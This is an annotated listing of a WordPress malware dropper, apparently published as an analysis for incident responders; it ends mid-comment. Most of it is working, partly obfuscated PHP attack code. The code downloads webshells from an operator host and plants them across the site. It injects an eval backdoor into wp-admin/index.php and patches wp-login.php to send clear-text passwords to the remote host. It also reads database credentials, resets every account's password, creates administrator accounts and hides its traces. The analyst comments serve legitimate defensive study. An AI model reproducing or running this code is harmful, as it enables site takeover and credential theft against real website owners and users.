function urla($url, $header = null, $postdata = null)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
// Verification is disabled only when the URL does not contain "https:".
if (stripos($url, "https:") === false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (is_array($header) && !empty($header)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (is_array($postdata) && !empty($postdata)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
// Final step, only on a WordPress tree: tamper with wp-login.php and the user tables.
if (is_dir($root."/wp-includes") && is_dir($root."/wp-admin")) {
$loginpassword_result = loginpassword(); // 4
output_message($loginpassword_result, $message_type);
}
// The dropper deletes itself after one run, so the file will normally be absent from disk;
// the single request to it in the access log and the artefacts it wrote are what remain.
@unlink( __FILE__ );
?>
Original Code
<?php
// [analyst note] Obfuscated original of the dropper. The only obfuscation in this part is
// hex-escaping inside three string literals ($domain, $f_put, $f_get); PHP resolves the
// escapes when the double-quoted strings are parsed.
header( 'Content-Type: text/html;charset=utf-8' );
error_reporting( E_ALL );
// Assigned here but not read anywhere in the visible listing.
$seclevel = "|wp-head.php|wp-site.php";
// Hex-escaped URL of the remote host all payloads are fetched from (shown in clear text in the
// decoded listing on this page). A plain-text search for the host name will not match this line.
$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f";
// Filesystem directory and URL directory of this script, used to derive the site root.
$script_name= $_SERVER["SCRIPT_FILENAME"];
$scriptpath=pathinfo($script_name);
$scrip_dir=$scriptpath['dirname'];
$fullurl=$_SERVER['PHP_SELF'];
$currentpath=pathinfo($fullurl);
$currentdir=$currentpath['dirname'];
// Requested from the top-level URL directory: the script's own directory is the root.
// Otherwise the URL directory is cut off the filesystem directory.
if($currentdir=='/' || $currentdir=="\\")
{
$root=$scrip_dir;
}
else
{
$dirinfo=explode($currentdir,$scrip_dir);
$root=$dirinfo[0];
}
// Fall back to DOCUMENT_ROOT when the derived root is empty or still contains ".php".
if($root=='' || strpos($root, ".php") !== false )
{
$root=$_SERVER['DOCUMENT_ROOT'];
}
// The root is echoed and made the working directory for the relative paths used later.
echo $root.'<br/>';
@chdir( $root );
$http = ( isset( $_SERVER["HTTPS"] ) && $_SERVER["HTTPS"] == "on" ) ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
// Optional "db" request parameter; not read again in the visible listing.
if (isset($_GET["db"])) {
$gov = $_GET["db"];
} else if (isset($_POST["db"])) {
$gov = $_POST["db"];
} else {
$gov = '';
}
// "message_type" selects HTML (default) or JSON report output.
if ( isset( $_POST['message_type'] ) && ! empty( $_POST['message_type'] ) ) {
$message_type = $_POST['message_type'];
} else {
$message_type = 'html';
}
// Optional "q" request parameter; not read again in the visible listing.
if (isset($_GET["q"])) {
$q = $_GET["q"];
} else if (isset($_POST["q"])) {
$q = $_POST["q"];
} else {
$q = '';
}
// A "7" is appended to generated file names when this script's name contains "php7".
$current_name=basename($_SERVER['PHP_SELF']);
if(strpos($current_name,'php7') !== false)
{
$enfile7='7';
}
else
{
$enfile7='';
}
// Partly hex-escaped names of file_put_contents / file_get_contents, called through the
// variables so that neither function name appears literally at the call sites.
$f_put = "\x66il\x65_p\x75t_\x63on\x74en\x74s";
$f_get = "\x66il\x65_g\x65t_\x63on\x74en\x74s";
// Ask the remote host for a record keyed by this site's Host header; only the first line of
// the response is used.
$sellerinfo=$f_get($domain.'/seller/readtxt1.php?domain='.$_SERVER["HTTP_HOST"]);
$sellerinfoarr=explode("\n",$sellerinfo);
$sellerinfo=$sellerinfoarr[0];
if($sellerinfo<>'')
{
// Record format as parsed here: "<url>|<entry>,<entry>,..." with each entry split on ":".
// NOTE(review): what the "seller" file and $mode represent is not shown in this listing.
if(strpos($sellerinfo,'|') !== false)
{
$sellerinfoarray=explode('|',$sellerinfo);
$sellerinfo=$sellerinfoarray[0];
$sellersizearray=explode(',',$sellerinfoarray[1]);
$parsedUrl = parse_url(trim($sellerinfo));
$sellsize=filesize($root.$parsedUrl['path']);
foreach($sellersizearray as $sellersizeinfo)
{
if(strpos($sellersizeinfo,strval($sellsize)) !== false)
{
$modelarray=explode(':',$sellersizeinfo);
$mode=(int)$modelarray[1];
break;
}
}
}
// $seller is the URL's path only when that file already exists under the site root.
$parsedUrl = parse_url(trim($sellerinfo));
if(file_exists($root.$parsedUrl['path']))
{
$seller = $parsedUrl['path'];
}
else
{
$seller ='';
}
}
else
{
$seller ='';
}
// Remote-supplied path is echoed into the HTML response without escaping.
echo '<span style="font-size:15px; color:red;">seller-enfile:'.$seller.'</span><br/>';
// Disabled code kept by the author: it would have prepended the downloaded "login" part to the
// existing seller file in place.
// if(file_exists($root.$seller))
// {
// $sellerfc=file_get_contents($root.$seller);
// $loginpart=get($domain.'mjcode/login.gif');
// if($loginpart)
// {
// $sellerlast=$loginpart.$sellerfc;
// $serllerput=file_put_contents($root.$seller,$sellerlast);
// if($serllerput)
// {
// echo 'mjlogin success';
// }
// }
// else
// {
// echo '<span style="color:red;">mjlogin fail</span>';
// }
// }
// fi1() fills $arpath8 with directories that have no index.php; fp2() filters it by depth.
$arpath8 = array();
fi1( $root );
$fp2 = @fp2($root);
$htens = array();
// .htaccess content written by sedht(): routes every request for a non-existent file or
// directory to index.php.
$ht =
'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
';
// Repeats the "q" parsing and $current_name assignment from above with the same result.
if (isset($_GET["q"])) {
$q = $_GET["q"];
} else if (isset($_POST["q"])) {
$q = $_POST["q"];
} else {
$q = '';
}
$current_name=basename($_SERVER['PHP_SELF']);
// fp2(): returns the entries of the global $arpath8 that consist of at least three
// "/"-separated segments once $root is removed from them.
// The parameter is shadowed by `global $root`, so the global value is what the body reads.
function fp2($root)
{
global $root, $http, $host, $domain, $ht, $gov, $arpath8;
$p_arr = array();
$pnew_arr = array();
foreach ($arpath8 as $k => $v) {
$qupath = str_replace($root, "", $v);
$p_arr[$k] = explode("/", $qupath);
// Keep only paths that are at least three segments deep.
if (count($p_arr[$k]) >= 3) {
$pnew_arr[] = $v;
}
}
return $pnew_arr;
}
// enfile(): downloads content from $domain (remote names end in ".gif") and stores it under
// ".php" names inside the site, then returns a report array with 'title', 'status', 'file'
// (URLs of written files) and, when set, 'message' and 'htcontent'.
// The downloaded content itself is not part of this listing. Most writes are prefixed with @,
// so failures are silent. Every file name below is a file-system indicator for responders.
function enfile() {
global $root, $http, $host, $domain, $arpath8, $fp2, $enfile7,$seller;
$htens = array();
$return_result = array();
$return_result['title'] = 'create shell';
$return_result['status'] = 'ok';
$return_result['file'] = array();
// Writes <root>/wp-info.php from t1/h2.gif (existing file is made writable first); not reported.
$filename='wp-info.php';
$rfnew = get( $domain . 't1/h2.gif');
if(file_exists($root.'/'.$filename))
{
@chmod($root.'/'.$filename,0644);
}
$xdnew_ok = @file_put_contents($root.'/'.$filename,$rfnew);
if ( $xdnew_ok ) {
$xdnew_url = $http . "://" . $host . '/' . $filename;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
// Writes <root>/wp-term.php from sitemap/wp-term.gif; not reported.
$filenamesite='wp-term.php';
$siterfnew = get( $domain . 'sitemap/wp-term.gif');
if(file_exists($root.'/'.$filenamesite))
{
@chmod($root.'/'.$filenamesite,0644);
}
$xdnewsite_ok = @file_put_contents($root.'/'.$filenamesite,$siterfnew);
if ( $xdnewsite_ok ) {
$xdnewsite_url = $http . "://" . $host . '/' . $filenamesite;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
// Writes <root>/wp-ver.php from t1/wp-ver.gif; not reported.
$filenamever='wp-ver.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamever))
{
@chmod($root.'/'.$filenamever,0644);
}
$xdnewver_ok = @file_put_contents($root.'/'.$filenamever,$verrfnew);
if ( $xdnewver_ok ) {
$xdnewver_url = $http . "://" . $host . '/' . $filenamever;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
// Overwrites <root>/wp-content/index.php with the same t1/wp-ver.gif content; not reported.
$filenamwpindex='wp-content/index.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamwpindex))
{
@chmod($root.'/'.$filenamwpindex,0644);
}
$xdnewpindex_ok = @file_put_contents($root.'/'.$filenamwpindex,$verrfnew);
if ( $xdnewpindex_ok ) {
$xdnewpindex_url = $http . "://" . $host . '/' . $filenamwpindex;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
// Writes <root>/wp-content/plugins/wp-ver.php, again from t1/wp-ver.gif; not reported.
$filenamever2='wp-content/plugins/wp-ver.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamever2))
{
@chmod($root.'/'.$filenamever2,0644);
}
$xdnewver2_ok = @file_put_contents($root.'/'.$filenamever2,$verrfnew);
if ( $xdnewver2_ok ) {
$xdnewver2_url = $http . "://" . $host . '/' . $filenamever2;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
// Writes <root>/wp-content/plugins/wp-config-sample.php from t1/blust.gif; reported.
$filename2='wp-content/plugins/wp-config-sample.php';
$rfnew2 = get( $domain . 't1/blust.gif');
if(file_exists($root.'/'.$filename2))
{
@chmod($root.'/'.$filename2,0644);
}
$xdnew_ok2 = @file_put_contents($root.'/'.$filename2,$rfnew2);
if ( $xdnew_ok2 ) {
$xdnew_url2 = $http . "://" . $host . '/' . $filename2;
$return_result['message'][] = 'file:' . " \t" . $xdnew_url2 . ' success';
$return_result['file'][] = $xdnew_url2;
}
// Writes <root>/wp-admin.php (a file in the root, not the wp-admin directory) from t1/u1.gif;
// not reported.
$filename5='wp-admin.php';
$rfnew5 = get( $domain . 't1/u1.gif');
if(file_exists($root.'/'.$filename5))
{
@chmod($root.'/'.$filename5,0644);
}
$xdnew_ok5 = @file_put_contents($root.'/'.$filename5,$rfnew5);
if ( $xdnew_ok5 ) {
$xdnew_url5 = $http . "://" . $host . '/' . $filename5;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url5 . ' success';
//$return_result['file'][] = $xdnew_url5;
}
// Writes <root>/wp-admin/checkbox.php from t1/u1.gif and sets its timestamp 280 days into the
// past, so a "recently modified files" search will not surface it; not reported.
$filename6='wp-admin/checkbox.php';
$rfnew6 = get( $domain . 't1/u1.gif');
if(file_exists($root.'/'.$filename6))
{
@chmod($root.'/'.$filename6,0644);
}
$xdnew_ok6 = @file_put_contents($root.'/'.$filename6,$rfnew6);
if ( $xdnew_ok6 ) {
$xdnew_url6 = $http . "://" . $host . '/' . $filename6;
//$return_result['message'][] = 'file:' . " \t" . $xdnew_url6 . ' success';
//$return_result['file'][] = $xdnew_url6;
@touch('wp-admin/checkbox.php', strtotime("-280 days", time()));
}
// Writes <root>/checkbex.php. Without a seller file the content is t1/h3.gif; with one, it is
// the downloaded mjcode/login.gif part followed by a copy of the local seller file. Reported.
$loginpart=get( $domain . 'mjcode/login.gif');
$filename3='checkbex.php';
if(!$seller)
{
$rfnew3 = get( $domain . 't1/h3.gif');
}
else
{
$rfnew3 =file_get_contents($root.$seller);
$rfnew3 = $loginpart.$rfnew3;
}
if(file_exists($root.'/'.$filename3))
{
@chmod($root.'/'.$filename3,0644);
}
$xdnew_ok3 = @file_put_contents($root.'/'.$filename3,$rfnew3);
if ( $xdnew_ok3 ) {
$xdnew_url3 = $http . "://" . $host . '/' . $filename3;
$return_result['message'][] = 'file:' . " \t" . $xdnew_url3 . ' success';
$return_result['file'][] = $xdnew_url3;
}
// Second stage: spread copies into directories collected by fi1() (those without an index.php).
$check_repeat = array();
// $custom_file = array('wp-content','wp-includes');
$custom_file = array();
// Remote payload names, fetched from $domain . 't1' . <name> in the loop below.
$wrmfwlf = array(
'/h1.gif',
'/h2.gif',
'/h3.gif',
'/h4.gif',
'/h5.gif',
'/i1.gif',
'/i2.gif',
'/i3.gif',
'/i4.gif',
'/i5.gif'
);
// With a seller file, its local path is appended twice as two extra sources.
if($seller)
{
array_push($wrmfwlf,$seller,$seller);
}
// Target directories: all of them when nine or fewer were found, otherwise a random pick of
// as many directories as there are sources.
if(count($arpath8)<=9)
{
for($num=0;$num<count($arpath8);$num++)
{
array_push( $custom_file, $arpath8[$num] );
}
}
else
{
$ranfile = array_rand( $arpath8, count( $wrmfwlf ) - count( $custom_file ) );
foreach ( $ranfile as $i ) {
array_push( $custom_file, $arpath8[ $i ] );
}
}
// File names given to the copies, paired by index with the sources above.
$self_shell_name = array(
'updates.php'.$enfile7,
'wp-config-sample.php'.$enfile7,
'wp-config-sample.php'.$enfile7,
'spacings.php'.$enfile7,
'duotones.php'.$enfile7,
'admin.php'.$enfile7,
'index.php'.$enfile7,
'themes.php'.$enfile7,
'customsizes.php'.$enfile7,
'checkbex.php'.$enfile7
);
if($seller)
{
array_push($self_shell_name,'wp-options.php'.$enfile7,'wp-link.php'.$enfile7);
}
//updates.php|wp-config-sample.php|themes.php|dimensiones.php|duotones.php|spacings.php|update.php|customs.php
$i = 0;
if(count($arpath8)<=9)
{
$enfilecount=sizeof( $arpath8 );
}
else
{
$enfilecount=sizeof( $wrmfwlf );
}
while ( $i < $enfilecount ) {
// Record directory => file name; the map is saved to .hcontentold at the end.
$htens[ $custom_file[ $i ] ] = $self_shell_name[ $i ];
// Relative path: resolved against the working directory set at the top of the script.
$sf = $custom_file[$i] . '/' . $self_shell_name[ $i ];
// A source containing ".php" is the local seller file (copied with the login part
// prepended); anything else is downloaded from the remote host.
if(strpos($wrmfwlf[ $i ],'.php') !== false){
$rf = $loginpart.file_get_contents($root.$wrmfwlf[ $i ]);
}else{
$rf = get( $domain . 't1' . $wrmfwlf[ $i ] );
}
$xd_ok = @file_put_contents($sf,$rf);
//$fh = fopen( $sf, "w+" );
//$xd_ok = fwrite( $fh, $rf );
//fclose( $fh );
if ( $xd_ok ) {
$xd_url = $http . "://" . $host . '/' . $sf;
$return_result['message'][] = 'file:' . " \t" . $xd_url . ' success';
$return_result['file'][] = $xd_url;
//if( basename($sf.'/index.php') != 'index.php' ){
// $self_shell_name[] = basename($sf);
//}
}
$i ++;
}
// Modifies the genuine wp-admin/index.php in place: a one-line PHP block that passes the POST
// field "cdshell" to eval() is put in front of the existing content, followed by downloaded
// k/ver.gif content. The file timestamp is then set 320 days into the past.
// Detection: compare wp-admin/index.php against a clean copy of the same WordPress release.
$wp_admin_content = @file_get_contents( 'wp-admin/index.php' );
if ( $wp_admin_content ) {
$vercontent=get( $domain.'/k/ver.gif');
$result = @file_put_contents( $root.'/wp-admin/index.php', "<?php if(isset(\$_POST['cdshell']) && !empty(\$_POST['cdshell'])){@eval(\$_POST['cdshell']);} ?>" .$vercontent."\n". $wp_admin_content );
if ( $result ) {
@touch('wp-admin/index.php', strtotime("-320 days", time()));
$xd_url = $http . "://" . $host . '/' . 'wp-admin/index.php';
$return_result['message'][] = 'file:' . " \t" . $xd_url . ' success';
$return_result['file'][] = $xd_url;
}
}
// Builds an .htaccess template: the rewrite block, a FilesMatch that denies requests for
// script-like extensions, and a second FilesMatch that allows the names substituted for the
// "{#htens}" placeholder. The substitution itself is not performed in this listing.
$htc = '';
$htc .= '<IfModule mod_rewrite.c>' . "\n";
$htc .= 'RewriteEngine On' . "\n";
$htc .= 'RewriteBase /' . "\n";
$htc .= 'RewriteRule ^index.php$ - [L]' . "\n";
$htc .= 'RewriteCond %{REQUEST_FILENAME} !-f' . "\n";
$htc .= 'RewriteCond %{REQUEST_FILENAME} !-d' . "\n";
$htc .= 'RewriteRule . index.php [L]' . "\n";
$htc .= '</IfModule>' . "\n";
$htc .= '<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|php7|php8|suspected)$">' . "\n";
$htc .= 'Order Allow,Deny' . "\n";
$htc .= 'Deny from all' . "\n";
$htc .= '</FilesMatch>' . "\n";
$htc .= '<FilesMatch "^({#htens})$">' . "\n";
$htc .= 'Order Allow,Deny' . "\n";
$htc .= 'Allow from all' . "\n";
$htc .= '</FilesMatch>' . "\n";
// Two hidden state files in the web root: .hcontentold (JSON map of directory => file name)
// and .hcontent (the template). Only the result of the second write is checked.
$htresult = file_put_contents( $root . '/.hcontentold', json_encode( $htens ) );
$htresult = file_put_contents( $root . '/.hcontent', $htc );
if ( $htresult ) {
$return_result['htcontent'] = $htc;
}
return $return_result;
}
/**
 * Fetch $url with cURL and return the raw response body.
 *
 * Analyst note: every call to this helper in the visible part of the sample
 * passes a URL built from $domain (the operator host), and the result is
 * written to disk by the caller.
 *
 * @param string $url URL to request.
 * @return string|bool Response body; false when curl_exec() fails (no error check here).
 */
function get( $url ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $url );
// Redirects are followed, so the final origin may differ from $url.
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
curl_setopt( $ch, CURLOPT_ENCODING, 'gzip,deflate' );
// Empty "Expect:" header suppresses cURL's automatic "Expect: 100-continue".
curl_setopt( $ch, CURLOPT_HTTPHEADER, array( 'Expect:' ) );
// The branch is taken when the URL does NOT contain "https:", so certificate and
// host-name verification are switched off only for handles that start as plain
// HTTP. Because redirects are followed, an http-to-https redirect would then be
// accepted without verification.
if ( stripos( $url, "https:" ) === false ) {
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
}
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
// Result is returned as-is; callers receive false on transport failure.
$body = curl_exec( $ch );
curl_close( $ch );
return $body;
}
/**
 * Print a step result either as JSON or as a simple HTML status listing.
 *
 * Analyst note: this is the operator-facing report of the dropper; the markers
 * "---------start" / "---------end" and "===>status:" appear verbatim in the
 * HTTP response and can serve as response-body signatures.
 *
 * @param mixed  $result       Result array with optional 'title', 'message' (list) and 'status' keys.
 * @param string $message_type 'html' for the HTML listing; any other value prints json_encode($result).
 * @param string $html_tag     Tag name wrapped around each message line.
 * @return void
 */
function output_message( $result, $message_type = 'html', $html_tag = 'li' ) {
// Non-HTML mode: dump the whole result as JSON and stop.
if ( $message_type != 'html' ) {
echo json_encode( $result );
return;
}
if ( ! is_array( $result ) ) {
return;
}
if ( ! isset( $result['title'] ) ) {
$result['title'] = '';
}
echo '---------start ' . $result['title'];
// NOTE(review): $result['message'] is read without an isset() check.
if ( sizeof( $result['message'] ) > 0 ) {
foreach ( $result['message'] as $message ) {
// Colour the keywords; the message text itself is echoed without HTML escaping.
$message = str_replace( 'success', '<font color="blue">success</font>', $message );
$message = str_replace( ' ok', '<font color="blue"> ok</font>', $message );
$message = str_replace( 'fail', '<font color="red">fail</font>', $message );
echo "<$html_tag>" . $message . "</$html_tag>";
}
}
if ( isset( $result['status'] ) && ! empty( $result['status'] ) ) {
// NOTE(review): $status stays undefined when 'status' is neither 'ok' nor 'fail'.
if ( $result['status'] == 'ok' ) {
$status = '<font color="green">' . $result['status'] . '</font>';
}
if ( $result['status'] == 'fail' ) {
$status = '<font color="red">' . $result['status'] . '</font>';
}
echo '---------end ' . $result['title'] . '===>status:' . $status;
} else {
// A missing or empty status is reported as "ok".
$status = '<font color="green">ok</font>';
echo '---------end ' . $result['title'] . '===>status:' . $status;
}
echo "<br />";
}
/**
 * Create or take over a WordPress account directly in the database.
 *
 * Analyst summary (malicious behaviour, documented for incident response):
 *  - reads wp-config.php from the current working directory and extracts the
 *    database name, user, password, host and table prefix with regexes;
 *  - connects with mysqli using those credentials;
 *  - when $changeAllPassword is true, overwrites user_pass for EVERY row of the
 *    users table with $encryptedPassword;
 *  - updates the password of $username if it exists, otherwise inserts it and
 *    adds an "administrator" capabilities row in usermeta.
 *
 * Response notes: rows inserted here carry the fixed user_registered value
 * '2021-05-21 09:13:26'; if the all-users update ran, every account's password
 * hash has been replaced and all accounts need a reset. All SQL is built by
 * string interpolation and no query or connection result is checked.
 *
 * @param string $username           Login name to create or update.
 * @param string $encryptedPassword  Value written verbatim into user_pass.
 * @param bool   $changeAllPassword  True to overwrite user_pass for all users first.
 * @return string Status text: "user ... exists, change password", "useradd ... ok" or "useradd ... fail".
 */
function adduser($username, $encryptedPassword, $changeAllPassword)
{
// None of these globals is referenced in the body below.
global $root, $http, $host, $domain, $ht, $gov;
// Relative path: resolves against the current working directory.
$contents = file_get_contents("wp-config.php");
// Pull the define() values and $table_prefix out of the config source text.
preg_match("@['|\"]DB_NAME['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchd);
preg_match("@['|\"]DB_USER['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchu);
preg_match("@['|\"]DB_PASSWORD['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchp);
preg_match("@['|\"]DB_HOST['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchh);
preg_match("@table_prefix\s*=\s*['|\"](.*?)['|\"]@", $contents, $matchw);
// NOTE(review): index 1 is read even if a pattern did not match.
$db_name = $matchd[1];
$db_user = $matchu[1];
$db_pass = $matchp[1];
$db_host = $matchh[1];
$db_pre = $matchw[1];
$db_port = "3306";
// Split a "host:port" DB_HOST value.
if (strstr($db_host, ":")) {
$arr = explode(":", $db_host);
$db_host = $arr[0];
$db_port = $arr[1];
}
if (trim($db_host) == "") {
$db_host = "localhost";
}
$con = mysqli_connect($db_host, $db_user, $db_pass, $db_name, $db_port);
// No WHERE clause: this replaces the password hash of every account.
if ($changeAllPassword == true) {
$sql = "update $db_pre" . "users set user_pass='$encryptedPassword'";
$query = mysqli_query($con, $sql);
}
$sql = "select * from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
if (!empty($row)) {
// Existing login: only its password hash is replaced.
$id= $row['ID'];
$sql = "update $db_pre" . "users set user_pass='$encryptedPassword' where user_login='$username';";
$query = mysqli_query($con, $sql);
return "user $username exists, change password";
} else {
// New login. The e-mail literal below appears as rendered on this page
// (the hosting site's e-mail protection replaced the original value).
$sql = "insert into $db_pre" . "users(user_login,user_pass,user_nicename,user_email,user_registered,user_activation_key,user_status,display_name) values('$username', '$encryptedPassword', '$username', '[email protected]', '2021-05-21 09:13:26', '', '0', '$username');";
$query = mysqli_query($con, $sql);
$sql = "select ID from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
$id = $row['ID'];
// Serialized capabilities array granting the administrator role.
$sql = "insert into $db_pre" . "usermeta(user_id, meta_key, meta_value) values($id, '$db_pre" . "capabilities', 'a:1:{s:13:\"administrator\";b:1;}');";
$query = mysqli_query($con, $sql);
$sql = "select * from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
if ($row['user_login'] == $username) {
return "useradd $username ok";
}
// Reached only when the read-back above did not return the new login.
// Copies every usermeta row of user_id 1 (presumably the first admin
// account - confirm per site) to $id where that key is not present yet.
$sql = "select * from ".$db_pre."usermeta where user_id=1 ;";
$result = mysqli_query($con,$sql);
if (mysqli_num_rows($result) > 0) {
while($row = mysqli_fetch_array($result)) {
$meta_key[]=$row["meta_key"];
$meta_value[]= $row["meta_value"];
}
}
// NOTE(review): $meta_key is never assigned when the query returned no rows.
for($b=0;$b<count($meta_key);$b++)
{
if($meta_key[$b]<>'')
{
$sql = "select * from ".$db_pre."usermeta where user_id=". $id." and meta_key='".$meta_key[$b]."';";
$result = mysqli_query($con,$sql);
if (mysqli_num_rows($result) <= 0)
{
$sql = "insert into ".$db_pre."usermeta(user_id, meta_key, meta_value) values(".$id.", '".$meta_key[$b]."', '".$meta_value[$b]."');";
$query = mysqli_query($con, $sql);
}
}
}
}
return "useradd $username fail";
}
/**
 * Patch wp-login.php with a credential-capture snippet and plant admin accounts.
 *
 * Analyst summary (malicious behaviour, documented for incident response):
 *  - if $root/wp-login.php exists, the file is rewritten so that the code held
 *    in $src is inserted before every "default:" label;
 *  - the inserted code runs on login POSTs (fields "log" and "pwd"), calls
 *    wp_authenticate(), and on success sends timestamp, host name, user name
 *    and clear-text password as query parameters of a GET request to
 *    wup.php on the operator host;
 *  - if $root/wp-config.php exists, adduser() is called twice: once for
 *    'wp-blog' with $changeAllPassword = true (all password hashes replaced)
 *    and once for 'wp-user'.
 *
 * Indicators visible here: the marker comment "/*login" + "*" + "/" and a function
 * named getm() inside wp-login.php; the logins 'wp-blog' and 'wp-user' in the
 * users table. A modified wp-login.php should be restored from a clean core
 * package of the same WordPress version, and passwords entered while the
 * patch was live treated as disclosed.
 *
 * @return array Result with 'title' and, where applicable, 'message' entries.
 */
function loginpassword()
{
// Of these globals only $root is used in the body below.
global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode, $domain;
$return_result = array();
$return_result['title'] = __FUNCTION__;
if (file_exists($root."/wp-login.php")) {
// $src is the PHP source that gets injected. It is a double-quoted string, so
// the \x.. escapes in it are resolved when this dropper runs; they spell the
// same operator URL that appears in clear text in the str_replace() further down.
$src="/*login*/
function getm(\$url){ \$ch = curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1); \$cnt = curl_exec(\$ch); curl_close(\$ch); return \$cnt;} if(isset(\$_POST['log']) && isset(\$_POST['pwd'])) { \$username=\$_POST['log'];
\$password=\$_POST['pwd'];
if(\$username){ \$userm = wp_authenticate( \$_POST['log'], \$_POST['pwd']);
if ( !is_wp_error( \$userm ) ) {
\$hurl=\$_SERVER['HTTP_HOST']; \$m=\"dt=\".date(\"Y-m-d-H:i:s\",time()).\"&shost=\".\$hurl.\"&user=\".\$username.\"&pwd=\".\$password; \$ws=\"\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f\"; @getm(\$ws.'/wup.php?'.\$m);} } } ";
$wplogin_file=$root.'/wp-login.php';
// NOTE(review): the handle is never closed, and $wploginc stays undefined if fopen() fails.
$handle = fopen($wplogin_file, "r");
if ($handle) {
$size = filesize($wplogin_file);
$wploginc = fread($handle, $size);
}
// Function names spelled with hex escapes so the literal names do not appear in this file.
$f_put = "\x66il\x65_p\x75t_\x63on\x74en\x74s";
$f_get = "\x66il\x65_g\x65t_\x63on\x74en\x74s";
// Empties whatever sits between "case 'login':" and the next "default:" -
// presumably to drop an earlier injection before adding a new one.
if (preg_match('/case \'login\':[\s\S]*?default:/', $wploginc)) {
$wploginc = preg_replace('/case \'login\':[\s\S]*?default:/', "case 'login':"."\n"."\n".'default:', $wploginc);
}
// str_replace() acts on every "default:" in the file, not only the login switch.
$wploginc= str_replace('default:',$src."\n"."\n".'default:',$wploginc);
$f_put($root.'/wp-login.php',$wploginc);
// Second pass: the clear-text operator URL is swapped for the output of
// strto16(), which is defined outside this view (presumably an escaped encoding).
$wplogin=$f_get($root.'/wp-login.php');
$wplogin_code= str_replace("http://s.newnday.xyz/",strto16("http://s.newnday.xyz/"),$wplogin);
$f_put($root.'/wp-login.php',$wplogin_code);
}
if (file_exists($root."/wp-config.php")) {
// First value has the "$P$" prefix of WordPress portable hashes; the true flag
// makes adduser() write it to every account. The second value is 32 hex characters.
$return_result['message'][] = adduser('wp-blog', '$P$BrYz9dLFOzP5z/3vTIH2fhdtEyGH7z.', true);
$return_result['message'][] = adduser('wp-user', '3a0b9bff4e2649af7d4c62878bf88b3e', false);
}
if (!is_dir($root . '/wp-includes') || !is_dir($root . '/wp-content')) {
$return_result['message'][] ='The site is not wp.';
}
return $return_result;
}
// Main sequence of the dropper (analyst annotations):
// 1. sedht()  - rewrites robots.txt and .htaccess, result printed to the operator.
$sedht_result = sedht();
output_message($sedht_result, $message_type);
// 2. enfile() - writes the secondary PHP files and returns their URLs.
$enfile_result = enfile(); // 3
// 3. down_s_file() - fetches one more payload and stores it as gh.php.
down_s_file();
if ( file_exists( "wp-config.php" ) ) {
//$adduser_message = adduser();
//$enfile_result['message'][] = $adduser_message;
}
output_message( $enfile_result, $message_type );
if ( $message_type == 'html' ) {
if ( isset( $enfile_result['file'] ) && sizeof( $enfile_result['file'] ) ) {
// Lists every dropped file URL with a "?pas=" query parameter appended. The
// value is a fixed string written with mixed hex/octal escapes. For log
// review: requests carrying a "pas" parameter to the dropped file names are
// follow-up access to these files.
echo "path:<br /><textarea style=\"width: 90%;height: 100px;\">";
foreach ( $enfile_result['file'] as $file ) {
$pas="\x47\157\x23\45\x31\60\x32\64\x40\115\x76\143";
echo $file."?pas=" .$pas. "\t";
}
echo "</textarea>";
}
if ( isset( $enfile_result['htcontent'] ) ) {
// Echoes the generated rewrite/access rules back to the operator.
echo "htcontent:<br /><textarea style=\"width: 40%;height: 200px;\">";
echo $enfile_result['htcontent'];
echo "</textarea>";
}
}
/**
 * Download a payload from the operator host and store it as gh.php.
 *
 * Analyst note: the remote resource is requested under a .gif name
